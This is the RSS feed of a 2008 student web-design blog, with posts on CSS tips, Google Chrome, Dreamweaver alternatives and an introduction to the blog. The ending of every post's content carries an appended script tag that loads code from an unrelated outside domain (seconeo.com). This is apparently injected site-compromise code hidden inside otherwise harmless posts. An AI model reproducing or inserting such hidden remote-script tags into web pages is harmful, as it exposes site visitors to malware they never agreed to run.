<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>356 ( The basics of )</title>
	<atom:link href="http://356.saplingisevolving.com/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://356.saplingisevolving.com</link>
	<description>A place for learning++</description>
	<pubDate>Mon, 27 Oct 2008 18:11:16 +0000</pubDate>
	
	<language>en</language>
			<item>
		<title>CS S</title>
		<link>http://356.saplingisevolving.com/?p=16</link>
		<comments>http://356.saplingisevolving.com/?p=16#comments</comments>
		<pubDate>Mon, 27 Oct 2008 18:11:16 +0000</pubDate>
		<dc:creator>tfaas</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://356.saplingisevolving.com/?p=16</guid>
		<description><![CDATA[Good advice
Google search &#8220;CSS Tricks&#8221;
Full of CSS tips
Very cool
]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.search-this.com/2007/03/26/10-quick-tips-for-an-easier-css-life/">Good advice</a></p>
<p><a href="http://www.google.com/search?hl=en&#038;client=firefox-a&#038;rls=org.mozilla%3Aen-US%3Aofficial&#038;hs=IHr&#038;q=css+tricks&#038;btnG=Search">Google search &#8220;CSS Tricks&#8221;</a></p>
<p><a href="http://css-tricks.com/">Full of CSS tips</a></p>
<p><a href="http://www.smashingmagazine.com/2007/01/19/53-css-techniques-you-couldnt-live-without/">Very cool</a><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://356.saplingisevolving.com/?feed=rss2&amp;p=16</wfw:commentRss>
		</item>
		<item>
		<title>Chrome</title>
		<link>http://356.saplingisevolving.com/?p=11</link>
		<comments>http://356.saplingisevolving.com/?p=11#comments</comments>
		<pubDate>Tue, 02 Sep 2008 02:48:31 +0000</pubDate>
		<dc:creator>tfaas</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://356.saplingisevolving.com/?p=11</guid>
		<description><![CDATA[Just a quick heads-up: soon you will have another browser to contend with. Thankfully it is built on webkit so it shouldn&#8217;t give you many headaches, but you never know.
Anyway, the news is interesting, as it is a google-created browser. Check it out
]]></description>
			<content:encoded><![CDATA[<p>Just a quick heads-up: soon you will have another browser to contend with. Thankfully it is built on webkit so it shouldn&#8217;t give you many headaches, but you never know.</p>
<p>Anyway, the news is interesting, as it is a google-created browser. <A href="http://www.techcrunch.com/2008/09/01/first-public-screen-captures-of-google-chrome/">Check it out</a><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://356.saplingisevolving.com/?feed=rss2&amp;p=11</wfw:commentRss>
		</item>
		<item>
		<title>Dreamweaver alternatives</title>
		<link>http://356.saplingisevolving.com/?p=9</link>
		<comments>http://356.saplingisevolving.com/?p=9#comments</comments>
		<pubDate>Fri, 29 Aug 2008 01:41:44 +0000</pubDate>
		<dc:creator>tfaas</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://356.saplingisevolving.com/?p=9</guid>
		<description><![CDATA[Cheap and stingy, or just frugal. Sometimes you don&#8217;t have the cash to shell out 300-some dollars for the student version of Adobe Creative Suite, and you certainly don&#8217;t want to be in the labs all your waking hours. What do you do in lieu of finding a copy of Dreamweaver that has the chance [...]]]></description>
			<content:encoded><![CDATA[<p>Cheap and stingy, or just frugal. Sometimes you don&#8217;t have the cash to shell out 300-some dollars for the student version of Adobe Creative Suite, and you certainly don&#8217;t want to be in the labs all your waking hours. What do you do in lieu of finding a copy of Dreamweaver that has the chance of making you do the leagal dance down the road? Find an alternative you can live with, of course. Here&#8217;s a quick list to get you thinking.</p>
<p><strong>1) Notepad</strong></p>
<p>The man&#8217;s way of programming HTML and anything else. Notepad is simple, no-frills text editing at its best. Name your file whater.asp, open it up in notepad, and you&#8217;re ready to roll.</p>
<p>Disadvantages: No site controll; no syntax highlighting; no file tabs.</p>
<p><strong>2) <a href="http://notepad-plus.sourceforge.net/uk/site.htm">Notepad ++</a></strong></p>
<p>Someone knew that notepad was sweet, but it needed some futuristic components. With the addition of a WYSIWYG editor, syntax highlighting for all your favorite languages, and tabbed files, the ++ is certainly deserved. Also, totally free.</p>
<p>Disadvantages: Still no site function, not a FTP function.</p>
<p><strong>3) <a href="http://www.aptana.com/studio">Aptana</a></strong></p>
<p>A new player, Aptana is focused towards boosting the productivity of the current state of web development. Tabbed files, syntax highlighting, site forms, and FTP function are all here.</p>
<p>Disadvantages: Programmed from an open-source perspective, Microsoft languages not supported. Heavily focused on AJAX and javascript, may not be for beginning users.</p>
<p><strong>4) <a href="http://www.eclipse.org/">Eclipse</a></strong></p>
<p>Eclipse is much like notepad++, but with no support for microsoft languages. An extendible IDE that can be used for pretty much anything, and free.</p>
<p>Disadvantages: Eclipse is meant mainly for programming, and less for web development. Use with extreme caution.</p>
<p><strong>Others</strong></p>
<p>If you google for <a href="http://www.osalt.com/dreamweaver">Dreamweaver alternatives</a>, you find a good deal. A word of caution before choosing the perfect one: Dreamweaver is sometimes synonymous with phrase &#8220;HTML Layout program&#8221;, and many of the alternatives listed will not provide a good interface for the dynamic backend coding needed in this class.<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://356.saplingisevolving.com/?feed=rss2&amp;p=9</wfw:commentRss>
		</item>
		<item>
		<title>Welcome ( the first post )</title>
		<link>http://356.saplingisevolving.com/?p=3</link>
		<comments>http://356.saplingisevolving.com/?p=3#comments</comments>
		<pubDate>Tue, 26 Aug 2008 23:58:45 +0000</pubDate>
		<dc:creator>tfaas</dc:creator>
		
		<category><![CDATA[Misc]]></category>

		<guid isPermaLink="false">http://356.saplingisevolving.com/?p=3</guid>
		<description><![CDATA[This is the easy post: I introduce why this blog is a good idea.  CGT 356 is a great class; it is an awesome class; it is&#8230; only the beginning. It&#8217;s so basic that your mind may explode from the sheer depth of the basics that you must deal with.
This blog is for anything but [...]]]></description>
			<content:encoded><![CDATA[<p>This is the easy post: I introduce why this blog is a <em>good idea</em>.  CGT 356 is a great class; it is an awesome class; it is&#8230; only the beginning. It&#8217;s so basic that your mind may explode from the sheer depth of the basics that you must deal with.</p>
<p>This blog is for anything but the basics.</p>
<p>This blog is going to help you make websites that stand up with the giants that you visit everyday. It help you make websites that have the flare that we expect from Computer Graphics students, and and will hopefully introduce you to the <em>practice </em>of web design, not just the basics you must learn</p>
<p>To best summarize why this blog exists, I will tell you what I wanted to name it: &#8220;What I wish I learned about web design from 356, but didn&#8217;t&#8221;. It was a bit too long, sadly.</p>
<p><em>About me:</em></p>
<p>A graduate student in Computer Graphics Technology, I just received my BS from the same program a mere 3 months ago. I graduated with a heavy focus in interactive multimedia, and yet for that last year I was learning the state of web design during my internship at <a href="http://www.haanmc.com">Haan M+C</a>, a marketing firm in Lafayette. During that time I built many critical components for <a href="http://www.unityhc.com">Unity Health Center&#8217;s</a> website.<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://356.saplingisevolving.com/?feed=rss2&amp;p=3</wfw:commentRss>
		</item>
	</channel>
</rss>
